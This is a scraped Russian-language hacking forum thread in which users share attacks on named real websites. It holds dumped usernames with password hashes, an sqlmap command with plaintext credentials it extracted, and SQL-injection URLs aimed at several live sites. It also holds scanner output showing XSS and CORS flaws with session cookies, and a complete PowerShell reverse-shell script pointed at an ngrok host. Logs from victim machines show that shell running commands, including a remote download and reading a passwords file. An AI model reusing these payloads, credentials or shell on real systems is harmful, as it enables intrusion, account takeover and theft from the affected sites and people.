| rokas2006o | aeeda19052db157fea85d07a136961e4 | <blank> |
| kronas7 | 36a222a634048ef9f046e10374fd50f2 | <blank> |
| EDGA2007 | 2c23624a0ca27c42b52d16d7a6619e4a | <blank> |
| hyhyu | 0ad07a5e00a369e7b12b2e9fea8d0634 | <blank> |
| Loginukas_TitasK | ba1992e8e09519c3ff770d837f30e26d | <blank> |
| niks | 77f5b1b21376c34b437f3ae7b710032d | <blank> |
| jmantas | bea17698f6ef05c4dfedadc3a2ebe159 | <blank> |
| gretaman | d86e064224752831d23f193999d9acec | <blank> |
| Mineralas | 6ba3e65c8bada65525cc0935b303820e | <blank> |
| gvidas1b | 06a5161c6174dfd750a897795cd090c5 | <blank> |
| deividas8 | d56b699830e77ba53855679cb1d252da | <blank> |
| Gabijas123 | f21e954393e402230fb2d2036f6edf15 | <blank> |
| 0234 | c8e585c56adbcb064ff08aa53e5f3aef | <blank> |
| 8evita7 | 10133114d2f505dc5c1ef7e40309722e | <blank> |
| uleleivaite | 92ea19d0ceeb1040ec8d2e54099f6af8 | <blank> |
| Rikakaka | 9e1d17cb4f5c88e360e4d00485c3d4ac | <blank> |
| mantas00 | 690a12a6af8eb6af195fb5d0862d0c82 | <blank> |
| motka | 4aa153b6e409865b5fb75504c508671a | <blank> |
| jolanta0727 | e1497dc965d9de0778c8327b25376ee3 | <blank> |
| ugn?2006 | 9bcdf44259cf895f6fad2489b116335f | <blank> |
| vetre | a5a8c37fbc23ffb1962697f432704214 | <blank> |
| 6617vida | 93b6c2ad6d36cbbd991bde32e1724020 | <blank> |
| Paulinap9 | b42e5c3e6ecaff449195c8df8d693289 | <blank> |
| klas | d2c8a5993d846842bb4bdafc5eeb7812 | <blank> |
| ulkeris123 | f77237676e8b75887409fe47e3e6cead | <blank> |
| Kovotoja | 113325c8479560ba7ed4efb087d17a0d | <blank> |
| austuliukazz | ab2a1855b6651364ce2f18a67803f6e6 | <blank> |
| simona2004 | 28abcfb4f5cfa2c438c9692b3ee55f18 | <blank> |
| ere | b53759f3ce692de7aff1b5779d3964da | <blank> |
| Asdpv1 | 81dc9bdb52d04dc20036dbd8313ed055 | <blank> |
| Dangyt? | fccd5e61da51f1f3abdcdd23fba8933e | <blank> |
| Justinas09 | f0077328b9552b784366b4e581f4e1be | <blank> |
| kamile3a | 46ff1e7dd42d21d1aaffedb1dd32b12b | <blank> |
| Teleskopas | 10f0712e906785c770ccd750e2046a06 | <blank> |
| tomas12345 | 5d190e25806e1d7396ec5ccf3389792e | <blank> |
| dikis789 | bd93bd9e4cef75e52c03fd3367dff176 | <blank> |
| kristinele | 287495e04aba9f381eca23444adfada5 | <blank> |
| Ug.Mur. | a15c363d1fe8af223765c70b5bd2d907 | <blank> |
| Anastasiuk | 172bc0ce00ce5b6a7170b3fe12a3ea05 | <blank> |
| milda12 | 21bdc258b7d8a7459a3c1ba63ee5888d | <blank> |
| M1ik2alau3ska4ite5 | 96950a6e5fe4a84b0488aa43fa3aaf8b | <blank> |
| ThunderBoltFX | f0822b5e246ad446c8c9352694826c5c | <blank> |
| eiviskaz | 2b55c83874a889401827be4099ba89b5 | <blank> |
| julijabog06 | 2fec61aaa0cfc94ba62f5d3f4c0a4624 | <blank> |
| akville-viliusyte | 47dcf28fe79d26ed6adb482f03e45125 | <blank> |
| jakvile | ac3a039c560b760b095dc93744822271 | <blank> |
| Migado | dcbe48c3c5f53d37f7eceae30ba812b6 | <blank> |
| danelius | 6e87b1341b336e295bfe46fad7230db0 | <blank> |
| drugelis70 | f1981e4bd8a0d6d8462016d2fc6276b3 | <blank> |
| jurgita? | 81dc9bdb52d04dc20036dbd8313ed055 | <blank> |
| aiva.mazutyte | 31119b42d084ac8f9f630066ca2bf79d | <blank> |
| diletute009 | 4a82089dc875da5210e2cb0c9ddbf136 | <blank> |
| marijana | 1359aa933b48b754a2f54adb688bfa77 | <blank> |
| MrPaulius00 | b90a45e4cbef94f8ef93745b3c5be5f1 | <blank> |
| Patricijak | 8e4d030251877883e3ff22247d11ad39 | <blank> |
| Kaspas | eb0e080feb8ce76169cf35d7d8aa4845 | <blank> |
| JJoana | ade16af2c9478e33fe1d92574f47ce32 | <blank> |
| tituskinas | 47dcf28fe79d26ed6adb482f03e45125 | <blank> |
| agugagaga | 2f7ae09bf863454916f1e9caaf2dcfeb | <blank> |
| kajetonas123456 | 5fa72358f0b4fb4f2c5d7de8c9a41846 | <blank> |
| dzuliscom | ae63a5afd3359a32754f3dd8e798d2b7 | <blank> |
| Aretule | 3ccc86d0e793c36c7b0c46ac54e0088e | <blank> |
| Paulina18 | 06a2def7cd316bf8facb1744e8cba2de | <blank> |
| Monikakr | 8ef20f777312a1a0a868257e124c815e | <blank> |
| ILS5 | 73db2673d42f2f3fbc51b400de385932 | <blank> |
| fortepijonas | 65d29b8a9c007b1e6aa6edbb25df5f7a | <blank> |
| Azuolas1337 | 1d6783d6b3d64ddde494ef1efba68dd7 | <blank> |
| tata6 | 3b544d856ee5cdf6820f15cd459413d6 | <blank> |
| jbkbkbkbjk | 5d1644c5b1ff7d51ee7c841ffb781c8d | <blank> |
| kakesude | 46ff1e7dd42d21d1aaffedb1dd32b12b | <blank> |
| Austeja591 | 1f3031b9a2da16a881fb7601635dada2 | <blank> |
| ltijutevsf | 077e675d4e5d58da8a8ee1a51fcd6dbb | <blank> |
| RETROPAS | 133eaef4dea0639bd4ceac81d17bdb40 | <blank> |
| Oksana99 | 67f18d8593dc530d18ed8ad5254153da | <blank> |
| lietuviukas | 84d9ee44e457ddef7f2c4f25dc8fa865 | <blank> |
| MEILIUKAS | f8a47510ac91fd1063bd02f2d8e449ac | <blank> |
| Nerijus1332y | 785c890c4a9ab8423eb4df152f6db330 | <blank> |
| Almant?2010 | a2f251d5347a35299bb72db492af3f01 | <blank> |
| karolinasalelionyte | 7cf28a286c02c760dfbdcf3c1f18e81e | <blank> |
| Lap?nuopaj?rio | 9caa7ba5228db13d58c76c5565fa5536 | <blank> |
| JonasAdomas | 25f9e794323b453885f5181f1b624d0b | <blank> |
| kjiuhygtbbb | 95af66e2fc9b075bc6292365eace7d6d | <blank> |
+-----------------------+----------------------------------+---------+
 
-u http://starcarz.in/single-car.php?id=4875 -D starcarz -T user -C name,email,password --dump --threads=10 --random-agent --hex --is-dba

Сайт покупки и продажи авто

[04:14:06] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.6.40
back-end DBMS: MySQL 5
[04:14:06] [INFO] testing if current user is DBA
[04:14:06] [INFO] fetching current user
current user is DBA: False

+----------+----------------------+------------+
| name | email | password |
+----------+----------------------+------------+
| SIMAR | <blank> | kyra1801 |
| Vikas | autoloan@starcarz.in | syal@123 |
| Finance | autoloan@starcarz.in | star@1994 |
| Rajinder | <blank> | 03543 |
| arun | <blank> | 98111 |
| inder | <blank> | 74384 |
| Accounts | autoloan@starcarz.in | kiran@1110 |
| CHARAN | <blank> | CHARAN |
+----------+----------------------+------------+
 
Пожалуйста, обратите внимание, что пользователь заблокирован
HTML:
https://www.comodo.com/news/press_releases/2011/02/' UnIoN SeLEcT NULL,NULL,NULL,NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bjws.html
 
Пожалуйста, обратите внимание, что пользователь заблокирован
YНа уязвимость года,века,минуты,секуунды не претендую, скорее мысли в слух.
Думю с таким подходим не долго будет музяка играть.
П.С было бы круто от кого-нить получить ресёрч
Код:
https://gitweb.torproject.org/
https://gitweb.torproject.org/admin/tor-jenkins.git/tree/config.xml
https://gitweb.torproject.org/admin/tor-nagios.git/tree/config/nagios-master.cfg
https://jenkins.torproject.org/user/nickm/my-views/view/All/job/tor-ci-windows-0.3.5/scmPollLog/
https://db.torproject.org/machines.cgi?host=buildbox
 

Вложения

  • Безымянный.png
    Безымянный.png
    37.6 КБ · Просмотры: 333
XSS, шоп de
У вас должно быть более 10 сообщений для просмотра скрытого контента.
The vulnerability affects https://www.filsuisse.de/ , /[*]/<s>/<s>/<s>/<s>/<s>-<n>
Discovered by /Scripts/PerScheme/XSS.script
Attack details

Path Fragment input /[*]/<s>/<s>/<s>/<s>/<s>-<n> was set to de"onmouseover=wjKQ(9269)"

HTTP request

GET /de"onmouseover=wjKQ(9269)"/magazin/rss/index/cat/innovation-mikrofibrillen-teil-2 HTTP/1.1
Referer: https://www.filsuisse.de/
Cookie: PHPSESSID=2c6ffmrgm9kddgmk6ndir0pdn4;adminhtml=74go7vh2j1qe7fuvk28b66jm90;frontend=6bttcgt8s9clgjekljl76dnge4;googtrans=/en/pl
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.filsuisse.de

The vulnerability affects https://www.filsuisse.de/pl/magazin , ___from_store
Discovered by /Scripts/PerScheme/XSS.script
URL encoded GET input ___from_store was set to de"onmouseover=4PCh(9473)"
GET /pl/magazin?___from_store=de"onmouseover=4PCh(9473)"&categories=1 HTTP/1.1
Referer: https://www.filsuisse.de/
Cookie: PHPSESSID=2c6ffmrgm9kddgmk6ndir0pdn4;adminhtml=74go7vh2j1qe7fuvk28b66jm90;frontend=6bttcgt8s9clgjekljl76dnge4;googtrans=/en/pl
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate


The vulnerability affects https://www.filsuisse.de/ , /<s>/[*]-<s>-<n>.html
Discovered by /Scripts/PerScheme/XSS.script
Path Fragment input /<s>/[*]-<s>-<n>.html was set to 8"onmouseover=2ivW(9831)"
GET /de/8"onmouseover=2ivW(9831)"-essentials-372.html HTTP/1.1
Referer: https://www.filsuisse.de/
Cookie: PHPSESSID=2c6ffmrgm9kddgmk6ndir0pdn4;adminhtml=74go7vh2j1qe7fuvk28b66jm90;frontend=6bttcgt8s9clgjekljl76dnge4;googtrans=/en/pl
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.filsuisse.de


CORS, шоп FR

У вас должно быть более 10 сообщений для просмотра скрытого контента.
The web application fails to properly validate the Origin header (check Details section for more information) and returns the header Access-Control-Allow-Credentials: true.
Discovered by /location/cors_origin_validation.js
Attack details

Access-Control-Allow-Origin: https://www.evil.com
Access-Control-Allow-Credentials: true Any origin is accepted (Blindly reflect the Origin header value in Access-Control-Allow-Origin headers in responses)
GET / HTTP/1.1
Origin: https://www.evil.com
Cookie: PHPSESSID=992fd7199083e153bbe82ee74749086c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.joueclub.fr
 
Xss, шоп, fr
У вас должно быть более 10 сообщений для просмотра скрытого контента.
The vulnerability affects https://www.bureau-vallee.fr/
Discovered by /Scripts/PerFolder/XSS_in_URI_Folder.script
URI was set to "onmouseover='hY0R(9775)'bad="
GET /;"onmouseover='hY0R(9775)'bad=" HTTP/1.1
Referer: https://www.bureau-vallee.fr/
Cookie: PHPSESSID=f6bdd8a6a8fe155427179de989fad1f4;X-Magento-Vary=b8b2e0c0ff50465002d10551af7e8f09fe26e2bd;fstrz_vary=b8b2e0c0ff50465002d10551af7e8f09fe26e2bd;multistore_shop=BV004;private_content_version=b54aaf2ee737dce16c5421c1cd496044
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.bureau-vallee.fr


Вроде как уязвимый плагин WordPress Plugin Yoast SEO Cross-Site Scripting (11.5), шоп, fr
У вас должно быть более 10 сообщений для просмотра скрытого контента.
The vulnerability affects http://www.wel-com.fr/
Discovered by /Scripts/WebApps/wordpress_9.script
Attack details
Current plugin version: 11.2.1.
Latest plugin version: undefined.
Plugin versions lower (or equal) to 11.5 are affected.
GET /blog/wp-content/plugins/wordpress-seo/readme.txt HTTP/1.1
Cookie: PHPSESSID=ek7hibvuc73gqm69un3pi87n75;adminhtml=p6fdfgfuimip0qei6s0aqd3oe5;cookielaw=1;frontend=h4ne64u7bootgbmi58gakvm101;wordpress_8a6da6dea86f68bb9ebf92941856fe16=+;wordpress_logged_in_8a6da6dea86f68bb9ebf92941856fe16=+;wordpress_sec_8a6da6dea86f68bb9ebf92941856fe16=+;wordpress_test_cookie=WP+Cookie+check;wordpresspass_8a6da6dea86f68bb9ebf92941856fe16=+;wordpressuser_8a6da6dea86f68bb9ebf92941856fe16=+;wp-postpass_8a6da6dea86f68bb9ebf92941856fe16=+;wp-settings-0=+;wp-settings-time-0=+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: www.wel-com.fr
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Вообщем не то что бы уязвимость, х#й знает куда выкладывать

Такое дело
Если на https://pastebin.com/
Загрузить реверс шелл В данным случаии я использовал

function Invoke-PowerShellTcp
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.

.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.

The script is derived from Powerfun written by Ben Turner & Dave Hardy

.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.

.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444

Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.

.LINK
#>
[CmdletBinding(DefaultParameterSetName="reverse")] Param(

[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,

[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,

[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,

[Parameter(ParameterSetName="bind")]
[Switch]
$Bind

)


try
{
#Connect back if the reverse switch is used.
if ($Reverse)
{
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
}

#Bind to the provided port if Bind switch is used.
if ($Bind)
{
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.start()
$client = $listener.AcceptTcpClient()
}

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
try
{
#Execute the command on the target.
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
}
catch
{
Write-Warning "Something went wrong with execution of command on the target."
Write-Error $_
}
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x

#Return the results
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}

Invoke-PowerShellTcp -Reverse -IPAddress ngrok.io -Port порт

прямо в таком виде.
Через некторое время мы получим доступ.
Удивительно, что и и зачем действует по такому методу.

Вообщем, Некто парсит новые топики, на пастбине, дальше грузит к себе на сервер, и запускает. Вообщем у кого еслть желания разберайтесь, думаю можно сделать неплохой ресёрч



Не много иныф
----------------

User Name SID
============== ==============================================
lewis-pc\lewis S-1-5-21-3202183191-2836257581-1814123393-1000


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
============================================================= ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
PS C:\Users\Lewis\AppData\Local\Temp> whoami priv
PS C:\Users\Lewis\AppData\Local\Temp> Type "WHOAMI /?" for usage.

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
PS C:\Users\Lewis\AppData\Local\Temp> net user

User accounts for \\LEWIS-PC

-------------------------------------------------------------------------------
Administrator Guest Lewis
The command completed successfully.


C:\Users\Lewis\AppData\Local\Temp
IEX http://84f9345a.ngrok.io -OutFile 'C:\Users\Lewis\AppData\Local\Temp\1.exe

------- ------ ----- ----- ------ -- -- -----------
75 8 1236 3884 0.02 1212 0 armsvc
123 10 15636 15272 0.16 892 0 audiodg
46 6 1244 3556 0.02 2152 1 conhost
454 10 1920 3792 0.13 328 0 csrss
250 10 2120 4996 0.30 372 1 csrss
73 8 1572 4356 0.03 1312 1 dwm
952 63 37456 58372 1.97 1348 1 explorer
0 0 0 24 0 0 Idle
492 19 3680 9256 0.23 472 0 lsass
141 7 2308 3876 0.05 480 0 lsm
48 8 1552 3560 0.00 1856 0 mscorsvw
348 31 77156 62716 2.64 2512 1 powershell
85 7 1804 4956 0.03 2780 0 SearchFilterHost
744 36 19840 14776 0.33 2564 0 SearchIndexer
313 11 2976 7824 0.03 2916 0 SearchProtocolHost
231 17 5700 8792 0.45 456 0 services
30 1 424 1080 0.11 244 0 smss
283 20 6432 10824 0.13 1036 0 spoolsv
405 26 10404 13184 0.13 280 0 svchost
368 14 4164 9036 0.31 580 0 svchost
254 15 3312 6840 0.13 660 0 svchost
432 22 19064 19320 0.44 744 0 svchost
392 22 5684 12784 0.19 784 0 svchost
911 41 13716 25576 0.75 812 0 svchost
528 35 9244 15620 0.08 964 0 svchost
318 34 11220 13584 0.38 1064 0 svchost
270 25 6148 47904 0.25 1540 0 svchost
519 0 176 860 3.98 4 0 System
180 17 3276 6648 0.06 1236 1 taskhost
203 17 7112 13392 0.13 2052 0 taskhost
82 10 1544 4264 0.47 364 0 wininit
114 9 3032 6920 0.23 404 1 winlogon
221 15 4856 12232 0.13 2656 0 wmpnetwk

PS C:\Users\FlbFPp4\Downloawhoami
whflbfpp4-pc\flbfpp4
PS C:\Users\FlbFPp4\Downloadswhoami \all
PS C:\Users\FlbFPp4\Downloads> Type "WHOAMI /?" for usage.

whoami /all

USER INFORMATION
----------------

User Name SID
================== ==============================================
flbfpp4-pc\flbfpp4 S-1-5-21-1264351168-1298790803-1785832424-1001


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
============================================================= ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

PS C:\Users\FlbFPp4\Downloads> ifconfig /all

USER INFORMATION
----------------

User Name SID
================== ==============================================
flbfpp4-pc\flbfpp4 S-1-5-21-1264351168-1298790803-1785832424-1001


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
============================================================= ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled

PS C:\Users\FlbFPp4\Downloads> Invoke-PowerShellTcp : The term 'ifconfig' is not recognized as the name of a cmdlet, function,
script file, or operable program. Check the spelling of the name, or if a path was included,
verify that the path is correct and try again.
At C:\Users\FlbFPp4\Downloads\wlhvxxquvwowuyy.ps1:128 char:1
+ Invoke-PowerShellTcp -Reverse -IPAddress 0.tcp.ngrok.io -Port 14179
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: :)) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-PowerShell
Tcp

ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : FlbFPp4-PC
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Ethernet:

Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Realtek RTL8139C+ Fast Ethernet NIC
Physical Address. . . . . . . . . : 00-07-E9-E4-CE-4D
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Link-local IPv6 Address . . . . . : fe80::70e0:25bc:5a75:fd19%9(Preferred)
IPv4 Address. . . . . . . . . . . : 10.14.0.2(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.14.0.1
DHCPv6 IAID . . . . . . . . . . . : 33685504
DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-22-57-92-96-00-07-E9-E4-CE-4D
DNS Servers . . . . . . . . . . . : 10.0.0.1
NetBIOS over Tcpip. . . . . . . . : Enabled


PS C:\Users\FlbFPp4\Desktop> cat passwords.txt
9823hsdfvba
h23ug8fsfho32
1234abxc
 
кто-нибудь разобрался? разве это не открытые данные?

YНа уязвимость года,века,минуты,секуунды не претендую, скорее мысли в слух.
Думю с таким подходим не долго будет музяка играть.
П.С было бы круто от кого-нить получить ресёрч
Код:
https://gitweb.torproject.org/
https://gitweb.torproject.org/admin/tor-jenkins.git/tree/config.xml
https://gitweb.torproject.org/admin/tor-nagios.git/tree/config/nagios-master.cfg
https://jenkins.torproject.org/user/nickm/my-views/view/All/job/tor-ci-windows-0.3.5/scmPollLog/
https://db.torproject.org/machines.cgi?host=buildbox
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
Код:
http://www3.w-hs.de/JPR/lro/bp_neu.php?id=31233154+UnIoN+SeLEcT+1,2,(select(select+concat(0x3c2f7469746c653e,@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),4,5+--+-

http://cainskelton.com/joystickmapper/xbox-game.php?id=sdfsdf%27+UnIoN+SeLEcT+1,2,3,user(),5,6,7,8,9+--+-.
http://www.beautifulcard.com/en/newsDia.php?id=fgh' UnIoN SeLEcT 1,(select(select+concat(@:=0xa7,(select+count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@))),3,4,5,6,7,8,9,0,11,12--+-
 
Последнее редактирование:
Код:
Target:    http://www.njrat.org/certificate/index.php?cert=%Inject_Here%c74bacdc
Date:    20.1.2020 г. 4:53:18
DB Detection:    MySQL >=5 (Auto Detected)
Method:    GET
Type:    String (Auto Detected)
Data Base:    2951625_njrat
Table:    users
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх